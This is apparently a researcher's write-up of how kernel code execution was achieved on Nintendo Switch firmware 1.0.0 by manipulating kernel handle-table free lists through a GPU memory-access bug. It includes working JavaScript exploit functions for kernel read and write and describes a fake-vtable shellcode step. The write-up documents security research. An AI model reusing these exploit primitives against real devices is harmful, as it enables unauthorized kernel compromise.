The following is a write-up of how I initially achieved kernel code execution on the Nintendo Switch, very much inspired by hexkyz's write-ups. The work discussed was completed over the course of a single conversation between hthh and I during the evening of November 21st, 2017. A number of snippets are attached from that conversation as inline links, in the hopes that they'll be interesting to readers.
I would recommend one read hexkyz's recent write-up on how the switch was broken into via GPU DMA attacks. It's a great read!
In particular, he describes:
Additionally, the kernel itself would start allocating memory outside of the carveout region
if necessary. So, by exhausting some kernel resource (such as service handles) up to the point where 
kernel objects would start showing up outside of the carveout region, SciresM was able to corrupt an 
object and take over the kernel as well.
However, someone observing closely might notice that at this point neither hexkyz nor I had a copy of the plaintext of the Horizon kernel. Object corruption is difficult to implement when you don't know how the code that works with objects operates. This write-up is about how we actually gained arbitrary read/write (and thus dumped the kernel's code), as it's a pretty fun story.
Thanks to hexkyz's work with nvhax, we finally had a means to dump the entirety of the Switch's memory (DRAM), except for the portions that the OS "carved out" as secure. Hexkyz tested this out on 2.0.0 on November 18th-20th, and found that he could use nvhax to modify most of the system modules and all of the applets, but that the kernel and the special "built-in" system modules (FS, NCM, SM, PM, LOADER, and SPL) were all protected. During the day of November 21st, I tested this out on my own 1.0.0 console and my 3.0.0 console, and found unexpectedly that not only were the built-in system modules not protected on 1.0.0, but cursory visual inspection found what appeared to be kernel virtual addresses present and able to be modified. Overwriting a number of these caused the system to hang; this was a confirmation that the kernel was really using data stored in a location we could modify!
After some more investigation, I was sure that gaining kernel code execution would be possible, but that it would be very difficult without knowing how the kernel was using the objects I saw in memory -- one promising lead seemed to be the possibility of messing with a process's handles. For those unfamiliar with how the Horizon Kernel operates, "handles" are how user-processes interact with kernel objects; A handle is a 32-bit unique identifier corresponding to some object that the kernel maintains. When a process creates an object (for example, a shared memory), the kernel creates an entry for the object in the process's handle table, and returns the u32 identifier to the user-process. When the process wants to interact with the object it created (for example, by mapping or unmapping a memory), it passes in the object's handle as an argument, and the kernel looks up (and validates) the handle in the process's table in order to get the address of the relevant object.
This seemed like a good vector for interacting with objects, as every time a kernel object is created for a process, a new handle table entry will be created, and handles can be easily closed via a call svcCloseHandle, which will destroy the corresponding object. On the 3DS, kernel handle tables were fairly simple, and used a linked-list. In addition, 3DS handle tables only reserved space for a small number of entries in protected kernel RAM; when more were needed, the 3DS would allocate an external array of entries in less safe FCRAM. The hope was that they wouldn't be too different on the Switch. Sure enough, looking through DRAM found that handle table entries seemed present!
I reached out to hthh, hoping he and I could work on the problem together.
hthh started thinking about the best way to exploit the kernel with the primitives we had, noting that we were fairly lucky: the switchbrew folks (including plutoo, derrek, yellows8, and naehrwert) had obtained the kernel's code via a hardware attack earlier in the year, and plutoo in particular had publicly documented the structure of many kernel objects. He came up with a several plausible plans-of-attack; meanwhile, I started working on getting more information on what we exactly we could do. In particular, I had the idea to try locating the handle table for a specific process (I picked psc at random) -- I would dump DRAM, then open a new session to the psc service, which should create a new kernel object (and thus handle table entry) in the tables for both my process (nvservices) and psc's. From there, we could re-dump memory and check what had changed to find the right tables. Sure enough, this worked!
Our best idea was to try to craft a fake "KSharedMemory" object which mapped the kernel as readable to our process; if we could do that and then insert it into our process's handle table, we would theoretically be able to read/write the kernel like any othe rmemory. However, some quick poking at that and hthh's other ideas proved most either didn't work, or required us to know information about how the kernel's memory was laid out (for example, to know where object vtables were located). On the bright side, we discovered that the structures for handle table entries were very simple. The entries were a simple contiguous array in memory -- an allocated entry and a free entry were both 16 bytes, and some quick experimentation revealed they had the following form:
struct k_ht_entry {
    uint16_t handle_id; // Simple, incrementing ID for the object.
    uint16_t obj_type;  // Used by the kernel to guard against type confusion errors.
    uint32_t padding;
    KObject *obj;       // Kernel virtual pointer to the object.
};
struct k_ht_free_entry {
   struct k_ht_free_entry *next_entry; // Pointer to the next entry in free linked-list.
   uint64_t padding;
};Noting the linked-list structure seemed potentially abusable, I tested to confirm whether we could cause the kernel to use arbitrary memory when allocating handle table entries by modifying the free linked-list to point at memory we wanted it to use. It turned out that we could!
After some more discussion, hthh came up with a clever idea for how we could gain a limited (and bad) read primitive in the kernel. He suggested that we take advantage of the linked-list structure to learn memory contents: we would modify the next_entry field of the first entry in the free list to point at the memory we wanted to read, then allocate two objects. The first allocation would cause the kernel to treat our pointer as a free table entry, and a second would allocate an entry using the memory at our pointer. While this would corrupt the memory we were trying to read, it would also cause the kernel to treat the first 8 bytes at the pointer we provided as the next_entry field of a free entry; by freeing the first object we allocated, we would cause the kernel to convert its allocated table entry back into a free one...and write the contents of the memory we wanted to read as the newly freed entry's next_entry field. We could then overwrite the next_entry field to point where it should, preventing further corruption problems. This worked, and provided us with a somewhat arbitrary read primitive -- our limitations were that we could only read from memory mapped R-W (as the kernel needed to be able to write an allocated entry to wherever we were trying to read from), and that we couldn't read from any memory addresses where corruption would cause a crash. Luckily, the kernel had a linear mapping for all of DRAM as R-W (including its own code!) on 1.0.0, so the only real limitation was on whether what we wanted to read was safely corruptible.
Our code for implementing this technique was as follows:
nvcore.prototype.kernRead = function(addr) {
    var entry = this.getFirstFreeHandleEntry();            // Locate the next free handle table entry
    utils.log('First free entry at: '+entry.toString(16));
    this.gpuWrite(addr[0], entry);                         // Overwrite its next with our address
    this.gpuWrite(addr[1], entry + 4);
    var hnd1 = this.createSharedMemory(0x1000);            // Create two kernel objects
    var hnd2 = this.createSharedMemory(0x1000);
    this.closeHandle(hnd1);                                // Free the first object
    var retVal = this.gpuRead(entry);                      // Retrieve the value we wanted from next field
    this.gpuWrite((entry & 0x0FFFFFFF) + 0x20, entry);     // Clean up the entry.
    this.gpuWrite(0xFFFFFFFE, entry + 4);
    this.createSharedMemory(0x1000);                       // Leak memory to be safe against corruption.
    utils.log('*'+utils.paddr(addr)+' = '+utils.paddr(retVal));
    return retVal;
}This was very powerful -- we could dump early portions of the kernel's code this way that were no longer being executed at runtime, and could also dump kernel objects to learn vtable addresses. However, attempts to implement the shared memory technique and other attack vectors seemed not to work; we were clearly doing something wrong, and we couldn't dump the parts of code we needed for debugging without causing a crash due to memory corruption. After some more back-and-forth, though, hthh had the winning idea for how we could get a dump of the kernel using handle table manipulation without needing to have dumped any of the kernel's code at all!
His observation was that we could potentially take advantage of the handle_id field inside an allocated entry. This is a simple, linearly-incrementing 16-bit ID number associated with the entry -- the kernel just uses it to ensure that handle values do not collide in userspace. Because it simply incremented, we could allocate and release entries repeatedly until the lower 8 bits of the id were one less than whatever value we wanted to write. Then, if we made the kernel allocate a handle table entry at the address we wanted to write to, it would write the correct byte into memory where we wanted it to. We could then, one-byte-at-a-time, write whatever we wanted at any memory address -- the only downsides would be that we would corrupt 15 bytes past the end of where we were writing to, because of the other fields in the entry the kernel would cre, and that doing this would be very, very slow. In practice, we actually had to use a slightly different allocation pattern, since creating a handle table entry at an arbitrary address required creating an object, but I quickly wrote-up some code to implement this technique:
nvcore.prototype.kernWriteU8 = function(u8, addr, entry) {
    var hnd = this.createSharedMemory(0x1000);
    var val = this.gpuRead4(entry) & 0xFF;
    this.closeHandle(hnd);
    var numTimes = u8 + 0x200 - val;
    numTimes -= 2;
    numTimes &= 0xFF;
    utils.log('Writing '+u8.toString(16)+' requires '+numTimes+' allocations.');
    for (var i = 0; i < numTimes; i++) {
        this.closeHandle(this.createSharedMemory(0x1000));
    }
    this.gpuWrite(addr[0], entry);
    this.gpuWrite(addr[1], entry + 4);
    var hnd1 = this.createSharedMemory(0x1000);
    var hnd2 = this.createSharedMemory(0x1000);
    this.closeHandle(hnd1);
    this.gpuWrite((entry & 0x0FFFFFFF) + 0x10, entry);
    this.gpuWrite(0xFFFFFFFE, entry + 4);
}
nvcore.prototype.kernWrite = function(val, addr) {
    if (typeof(val) == 'number') {
        val = [val, 0];
    }
    var entry = this.getFirstFreeHandleEntry();
    utils.log('ENTRY: '+entry.toString(16));
    for (var i = 0; i < 8; i++) {
        var u8 = 0xFF << (8 * (i % 4));
        u8 &= val[(i / 4) >>> 0];
        u8 >>= (8 * (i % 4));
        u8 &= 0xFF;
        utils.log('Writing '+u8.toString(16)+' to '+utils.paddr(utils.add2(addr, i)));
        this.kernWriteU8(u8, utils.add2(addr, i), entry);
    }
}With our code written, hthh/I designed some simple test-cases. First, we would write 0xdeadcafecafebabe to a readable memory location, to confirm that we could write what we wanted where we wanted. Then, we would write a RET instruction to the first four bytes of the kernel's code region, and then create a fake kernel object with a fake vtable that had every entry pointing to our shellcode, so that when we closed the object the virtual destructor call for our fake object would cause our code to run. We ran our tests, and they worked!
From there, it was just a matter of writing a payload that would copy the kernel to a physical address we could read (we chose 0xC0000000). We used godbolt to generate a simple copy payload that only used 14 instructions total, and I started running it. From there, it was just a matter of waiting -- the technique we were using was really slow, taking up to 20 seconds per byte written, so it was almost a twenty minute wait for our successful dump of the kernel to complete.
With a binary dump of the kernel in hand, things immediately became very simple -- we loaded the kernel into a disassembler, and I wrote a quick payload that would use our write in order to get a better arbitrary write primitive, and from there install custom SVCs to allow for arbitrary kernel read and writes :)
None of this works on newer firmware versions, unfortunately, as starting in 2.0.0 the Horizon kernel no longer has external entry tables at all -- instead, every handle table object stores an array 1024 entries inside the kernel's secure carveout. More than that, they also replaced the linked list with a simpler offset storage, and it is no longer possible to coerce the kernel to allocate new handle table entries at arbitrary locations even if you do somehow manage to overwrite a free entry. This probably indicates that the external tables were just a hold-over from when Horizon was targeting the 3DS, where they made more sense due to kernel memory constraints.
You can find a copy of the original script I wrote early in the morning on November 22nd to install arbitrary kernel read/write SVCs here.
You can also find a cleaned-up copy of the script with actual documentation plus better features that I wrote on November 24th to install kernel read/write/copy primitives here.
With any luck, the above can make its way into Pegaswitch for usage on 1.0.0 systems sometime shortly after hexkyz's nvhax code does. Enjoy! :)
Good and interesting job. thanks for sharing